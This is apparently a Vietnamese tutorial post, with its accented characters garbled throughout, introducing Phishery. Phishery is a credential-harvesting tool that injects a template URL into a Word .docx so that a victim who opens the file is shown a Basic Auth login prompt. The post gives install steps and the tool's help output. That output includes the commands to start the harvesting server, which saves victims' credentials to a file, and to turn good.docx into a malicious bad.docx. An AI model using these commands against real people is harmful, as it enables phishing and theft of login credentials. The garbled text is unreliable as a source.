Phishery - S? nguy hi?m c?a file .Doc

Phishery l� g�?

Phishery gi?ng nhu l� m?t HTTP du?c K�ch ho?t SSL don gi?n v?i m?c d�ch ch�nh l� x�c th?c th�ng tin Basic Authentication.
Phishery c� th? tr�n URL v�o t�i li?u .docx Word.
S?c m?nh c?a phishery du?c ph�t huy t?t nh?t b?ng c�ch thi?t l?p m?t m?u c?a t�i li?u Word.

C�i d?t & C?u h�nh

Phishery du?c vi?t b?ng ng�n ng? l?p tr�nh Go v� t�c gi? c?a c�ng c? n�y d� ph�t h�nh nhi?u phi�n b?n cho Windows / OSX / Linux.
T?i phi�n b?n m?i nh?t t?i d�y.

M?t khi n?n nh�n c?a b?n m? m?t t?p tin bad.docx Word sau d� n� s? k?t n?i m?t v?i URL nh?t d?nh ( V� sau d� h?p tho?i dang nh?p s? xu?t hi?n n?u k?t n?i du?c thi?t l?p.


Extract the archive, and optionally, install binary to $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin


$ phishery --help

|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ Basic Auth Credential Harvester (____/
with Word Doc Template Injector

Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u -i good.docx -o bad.docx

-h, --help Show usage and exit.
-v Show version and exit.
-s The JSON settings file used to setup the server. [default: "settings.json"]
-c The JSON file to store harvested credentials. [default: "credentials.json"]
-u The phishery URL to use as the Word document template.
-i The Word .docx file to inject with a template URL.
-o The new Word .docx file with the injected template URL.

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